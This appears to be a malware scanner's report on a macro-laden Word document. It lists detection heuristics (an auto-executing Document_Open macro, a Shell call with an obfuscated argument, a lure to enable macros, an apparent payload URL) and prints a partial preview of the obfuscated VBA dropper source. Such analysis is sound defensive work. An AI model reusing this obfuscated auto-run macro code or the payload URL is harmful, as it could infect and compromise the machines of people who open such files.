MALICIOUS
152
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
k = Shell(ZTBiIcAJJ, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://orders.e-transaction.website/1x1/VBCvBflat2CmajorBatchKEYx.jpg In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 29792 bytes |
SHA-256: bbe1870ddac75ca6d01efc7f1c4d6e7a0d697146633683423d2acb409fbcd461 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
119 of 178 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call pdIC2KPGrnjO5wJtoNOgXqJntB3bnRf
End Sub
Private Sub pdIC2KPGrnjO5wJtoNOgXqJntB3bnRf()
Dim s34 As Object
If 88.2 = 22.2 Then
Else
End If
If 9 = 8 Then
Else
Dim t0s8S4U5Tn8DG2UO As String
t0s8S4U5Tn8DG2UO = "ThXaOEo.bIXbqcUA"
Dim p08h4gpbOs62XrqK9tqV1NTI2v0zaSHHOza
Application.Run uiQ5itjvqjCnnRMF4JGW1p0r & t0s8S4U5Tn8DG2UO & k1zO78rjpwIig0Sxi7TLl4boKWvcAWjNFn & pBOzROFp7AdAscLe3Yq2MX
End If
End Sub
Attribute VB_Name = "ThXaOEo"
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function pfCUcvXxQD8vS Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const uYj6YqRuilhtM3nNdYgSm = 5
#Else
Private Declare Function pfCUcvXxQD8vS Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const cz1JrtAeKle1kgGelfr1n1yQ = 26
Private Declare PtrSafe Function xqA2h6hW1UhOAA45GkcqKOWQ1y9KbG3 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function xqA2h6hW1UhOAA45GkcqKOWQ1y9KbG3 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dsXnSfZxJK95gWw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const r97E4rUgeqiPDi7glBOfdHG = 4
#Else
Private Declare Function dsXnSfZxJK95gWw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function iLzcZmTtBt7W4vbcUmShSyED3ADXVUbN Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function pfCUcvXxQD8vS Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const rAhGXHsCDrW35x4lIxAl1k = 38
Private Declare Function xqA2h6hW1UhOAA45GkcqKOWQ1y9KbG3 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function dsXnSfZxJK95gWw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function iLzcZmTtBt7W4vbcUmShSyED3ADXVUbN Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type krPb8FD3Rw
tYhdLudyzD As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function vUJuzqaMQk2ufFaFwFt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const tvyeh21PlvGbP2TWv = 2
#Else
Private Declare Function vUJuzqaMQk2ufFaFwFt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const rPy4 = 202
Private Declare PtrSafe Function kurNa Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function kurNa Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function hBJuMRB0OlIlcfD5oa Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const ldaPI9pf7TrIz9N4PUYb1eOTUHrArSLbJwua = 8
#Else
Private Declare Function hBJuMRB0OlIlcfD5oa Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function lnQYWIoY Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function vUJuzqaMQk2ufFaFwFt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const fm0TxyZQySqBO5CtHa5zk = 85
Private Declare Function kurNa Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function hBJuMRB0OlIlcfD5oa Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function lnQYWIoY Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type uYyCuPbHhODj1K6HQUCy
ujNzuuYEmmQwF As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function er3e7gJiMhAQCJ7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const rmAq6WZT2ob47nOSFXQaLEJbsEa0U0HI1m = 827047
#Else
Private Declare Function er3e7gJiMhAQCJ7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const l3 = 19015216
Private Declare PtrSafe Function qQTSniptbDKfN37m Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function qQTSniptbDKfN37m Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dx9ouAmmdIl0N Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const dlfxqqx8YSq9f3aVN8ztQUqv7 = 3
#Else
Private Declare Function dx9ouAmmdIl0N Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function tmTSQvI Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function er3e7gJiMhAQCJ7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const fZjSMqxvhaHV9 = 79
Private Declare Function qQTSniptbDKfN37m Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function dx9ouAmmdIl0N Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function tmTSQvI Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type pc9D9nDnUgndLvgSpAFg
p9XCRnUb2LjOIRAjnzF7gqho80x9luD As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function gdx8 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const mc6gztJf61Mw87pJAaTpwe3EWeWfE6VwHfeCJ8V0UsQMtmbN31MQDUTS091f9N2wqg = 336
#Else
Private Declare Function gdx8 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const vIxkXd6K0fcUbVF8xUrNkKGx = 768
Private Declare PtrSafe Function kfrofnl8OfScBOkldNYHy1 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function kfrofnl8OfScBOkldNYHy1 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function eUa7RViBxaFafktZbF Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const oBV = 4
#Else
Private Declare Function eUa7RViBxaFafktZbF Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function aa1ZPdAjjIbsySKLNnq37RpkIKG2e9ptZgZC Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function gdx8 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const umyUV8PPdvU5KbG0atuQ = 11
Private Declare Function kfrofnl8OfScBOkldNYHy1 Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function eUa7RViBxaFafktZbF Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function aa1ZPdAjjIbsySKLNnq37RpkIKG2e9ptZgZC Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type sxV8bp9XlMaiMyYiMrvRRFWHEk
oR2HrM63i9z9l As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function glp2zqJZ2uovdN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const tJv9ZaBtYa5FtTdxKvZPFcgEdebTGLT = 65
#Else
Private Declare Function glp2zqJZ2uovdN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const sIFpZBbC36y5z07J = 9743618
Private Declare PtrSafe Function uvfcZ7ot53zwDvaSW1a8XPe Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function uvfcZ7ot53zwDvaSW1a8XPe Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function hW1UpPqoP0ZQsCY75761WWGTVYlli1W Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const hIGrXfe = 4
#Else
Private Declare Function hW1UpPqoP0ZQsCY75761WWGTVYlli1W Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function qjlwZPnIIx4BCoyBBbSiVZdPh8 Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function glp2zqJZ2uovdN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const nUTKXIvt7MMgsJnneJtcBJU7ud83GdUQtq8 = 34
Private Declare Function uvfcZ7ot53zwDvaSW1a8XPe Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function hW1UpPqoP0ZQsCY75761WWGTVYlli1W Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function qjlwZPnIIx4BCoyBBbSiVZdPh8 Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type grYdI8BdxKgrSsOjMSTtxu5ZEr6RFWOa7
oYa2EnUO15kQnK4DP As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function gxenyymmXCuK7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const uF = 7617
#Else
Private Declare Function gxenyymmXCuK7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const b06rfm0iqaQZEuwr1i = 595650869
Private Declare PtrSafe Function eANFjtpjSW4NGFPLSGkG9GprFONHXoj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function eANFjtpjSW4NGFPLSGkG9GprFONHXoj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ng641GBoNMR3 Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const pAdELtihr0amYwgd = 2
#Else
Private Declare Function ng641GBoNMR3 Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function iH1bEWOQuUf9UgiMnwdBx Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function gxenyymmXCuK7 Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const aprWJohVIO9e8NGtc1scsfDSknKXvO0J4K = 78
Private Declare Function eANFjtpjSW4NGFPLSGkG9GprFONHXoj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function ng641GBoNMR3 Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function iH1bEWOQuUf9UgiMnwdBx Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type za9jbaRq7QztFjYyes
pMfD7DwlZ1wfGBjfZjs9 As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function gMvYUWN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const auI5eedRZEDPnxPSYs8h6KnbVEe7Bcyvd9s = 6518203
#Else
Private Declare Function gMvYUWN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const npObHo9fnhdKLwjCXJxGqjZ = 38574
Private Declare PtrSafe Function cmuqOhU5ZtHfTZtOeug1tRq29w Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function cmuqOhU5ZtHfTZtOeug1tRq29w Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function jYf2u54GJ Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const wsGz5ZTCQO = 1
#Else
Private Declare Function jYf2u54GJ Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function wLcIJtQ1wBJzmrdfa Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function gMvYUWN Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const oyfo6 = 11
Private Declare Function cmuqOhU5ZtHfTZtOeug1tRq29w Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function jYf2u54GJ Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function wLcIJtQ1wBJzmrdfa Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type xcVOrAOPvXfmFwXEqQIhJt5YED
cRadKRB As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function pLnFHiqr13Kr Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const y5HlS6r3b5jIv0C1GnpTW8lkgYQtboW = 3028093
#Else
Private Declare Function pLnFHiqr13Kr Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const zQ7fB4WR9hLtRmbJM5Nenk2UgE4 = 6066
Private Declare PtrSafe Function b7rSnclCaLQ2bI5Jxn7ZJM6a3aDUSBpQebPcKRn0dbSIQ4YBH7pgE7oZlx Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function b7rSnclCaLQ2bI5Jxn7ZJM6a3aDUSBpQebPcKRn0dbSIQ4YBH7pgE7oZlx Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function c49Jz5gnLTxlRHPucy Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const glr0qx8KM7fY2oBp55tTG205Tq = 7
#Else
Private Declare Function c49Jz5gnLTxlRHPucy Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function twrHQKxnBiFelYIIbBa74 Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function pLnFHiqr13Kr Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const wOsINSIXn96ArTgum2Fj1E = 42
Private Declare Function b7rSnclCaLQ2bI5Jxn7ZJM6a3aDUSBpQebPcKRn0dbSIQ4YBH7pgE7oZlx Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function c49Jz5gnLTxlRHPucy Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function twrHQKxnBiFelYIIbBa74 Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type b8SO7s46wi4frM13oH2mmNT929HTaYR
y0J As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function txoz Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const iXmZrYRlUB4xGaiWpdqsqAnSTiq = 325205
#Else
Private Declare Function txoz Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const nbOH6ThZn837U = 424451
Private Declare PtrSafe Function kosTFVn7sYUCN6j5u9afCDg Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function kosTFVn7sYUCN6j5u9afCDg Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function bGr2Wj7fucKNlAd Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const lyL9Ep6m7YDEqt4M8bXn = 5
#Else
Private Declare Function bGr2Wj7fucKNlAd Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function eByLFIXICpYFriIJ4rP5EVyWgddYsJ96n Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function txoz Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const pJs7Q = 53
Private Declare Function kosTFVn7sYUCN6j5u9afCDg Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function bGr2Wj7fucKNlAd Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function eByLFIXICpYFriIJ4rP5EVyWgddYsJ96n Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type ouNS8UuU4jZC4CDqSO6
mbpmo8a2q As Long
End Type
#If VBA7 Then
#Else
#End If
Public Sub bIXbqcUA()
On Error Resume Next
dakoKCOS
Do While 886 < 5
Select Case sEyAYht
Case "Ü»z®�?¯§ß¤ su·»x?º?¶¤Ì¡?z¦u?", "ç¸?Ë?", "Õµ®É?®?ê"
zxcbnmmf1 = "×Í?ÌÂ?·?Å"
Case "ë¼{ÂØc??ãi?t¡}½�¨Ê£?ÓÜx~»Ö� r?y ", "åǧÆØp¾¯Ád`~d?Ì?râ׺°x"
zxcbnmmf2 = "â°²¡ ?µ�×?zd?vªxƪ�?µo??®d{u|?¨rpÊ"
Case "çÍ?«¼l??é?", "èÔ{̳?¢{à?rab¦¢¢?áÇ?²??±¤Íe]¦f�?³?§"
zxcbnmmf3 = "à??¢Ú?¤?§ª??wwË ?ÄÄ?Ó"
Case Else
zxcbnmmf4 = "ywSPBNfzevaYMXA8EXAsu"
End Select
Exit Do
Randomize
Loop
Dim h5DbL8Dzu As String
Dim qBy5YtsMMuO3PpUdt As Integer
qBy5YtsMMuO3PpUdt = 4364
h5DbL8Dzu = "3RLivxKEmgZ2X1Fi"
Do While 727 < 8
Select Case gQPAiUTkOVRuTNC
Case "äÅ?½Ù???½?", "êά½²??±Ý?q??±?p§´?¯¨", "â? Í??Â?Úhnd?®¼¤?â¼? Â???§?¦v??¶o"
zxcbnmmf1 = "ݸÔà?"
Case "ã?¦�¡ «Í??�?|¹ªrêÐÀÁ±", "ßµ}§"
zxcbnmmf2 = "Öħϻ ¡¹Ä"
Case "䧺?© ?§Ú?y_?¨«¢?¢Ì|", "â??½±??¯î"
zxcbnmmf3 = "éÓ??¶?¥?Ê£�¦??¿??Þ£~??"
Case Else
zxcbnmmf4 = "hZp264C6CkAvGDJSQDMMMmUw6XOIl"
End Select
Exit Do
Randomize
Loop
Dim x6Yy1IohRA0jpYoPK9WE As String
Dim jjZLQH1rWQ9bvocoQH7twupkWmdOJFsR As Integer
jjZLQH1rWQ9bvocoQH7twupkWmdOJFsR = 4364
x6Yy1IohRA0jpYoPK9WE = "3RLivxKEmgZ2X1Fi"
Do While 578 < 8
Select Case bZSfjs6BBgja8Hfa9HbpjGH
Case "ÖÍÉÚy?zª®vbk° p", "é²~×s??ïyp?x?Ã?�ª??ÂÉp", "âÊ´¥�z³¸Ül]?{z«¦?ÊÜ{½Ü[?uÌ?_???�s?"
zxcbnmmf1 = "Ü??©Ýn¼°·?e`©¹ºtsÁ?vÆà? ¨Ý?v§j?"
Case "Ø°y?Ï?¶?ï?rr�ª??�»", "ìÃ?Ä¡??uí¥?¢?¾??¤«»¹¦Ï? ?Â"
zxcbnmmf2 = "Ü???"
Case "è«{Ñ©? ?¬?^a?µ¹?w", "ÙÄ?Ĺ ½?Àwc?©?§¢®ç?¹Í?d??½???"
zxcbnmmf3 = "ØȬ³Ó???Ù§oqw?¹"
Case Else
zxcbnmmf4 = "q4gEWFepCHACYqHzzn8HvdBUAl5a1TA66y0L"
End Select
Exit Do
Randomize
Loop
Dim spPxRmvfvVoDKb3iyYT6j As String
Dim d8zGRlGLwoah5eyYEODnkjdRFTK As Integer
d8zGRlGLwoah5eyYEODnkjdRFTK = 4364
spPxRmvfvVoDKb3iyYT6j = "3RLivxKEmgZ2X1Fi"
Do While 556 < 1
Select Case yVR
Case "Þ´?â?�»Ûu?��xò?Ó?§¥?_", "è´�Ð", "æÆxÐ??¥¼®}�¥{?¥�"
zxcbnmmf1 = "ܵ°?Â?�¯ç"
Case "Þ²¸¯Ý?¾«ê|^s?»Âx?´?¾¿«", "ä°"
zxcbnmmf2 = "ÙÑ�½°?Â?î?vy¢???±à´~"
Case "ÜÙµ¤Û ºé~", "Ø«´Í°p??Ø"
zxcbnmmf3 = "ßµ¯©¹~³?·?"
Case Else
zxcbnmmf4 = "l0oGaFD"
End Select
Exit Do
Randomize
Loop
Dim aFzimyXYSbIyuRWu9dOzXtpS As String
Dim sMk8RVrBGoOGNb4a As Integer
sMk8RVrBGoOGNb4a = 4364
aFzimyXYSbIyuRWu9dOzXtpS = "3RLivxKEmgZ2X1Fi"
Do While 295 < 6
Select Case uZPchk4qPTHhi9VdFdD3xswFi4YLyCh
Case "Öz°Í??¨¬¨?tu~??¯Õ§? Í[??©??¤?ªÊ", "ÖÒ? �\£?À?x ?yªp¨ÁÍ", "â¶~¥Ó|¢¸Ü? }e©§"
zxcbnmmf1 = "èϪ¯???yé?p?ªzª¥?¶Å?Ï"
Case "Û¯µÒ¼�çä?|bd??®?»¸?", "é¤É¯?¯?×xpf¤?º??뮵??"
zxcbnmmf2 = "ߧ�°Íy?v½c§¥~¢??׬¼ÊË??¸â«?"
Case "ä?Ä?�?ªæ????¶«??Ä?????Å", "æÉ?¬"
zxcbnmmf3 = "Ö©{�Íq�§Ç?¤cx�¬p¬á?{�Ü?¾¤Ä?�??¼?²«ãµ"
Case Else
zxcbnmmf4 = "auwuc2PsSkge89BnII5"
End Select
Exit Do
Randomize
Loop
Dim nwDSUqhTQCKx8QG4mwlFE6JSn21Y3L7oMGnUmy8skgJyfOqCbAd As String
Dim svY3 As Integer
svY3 = 4364
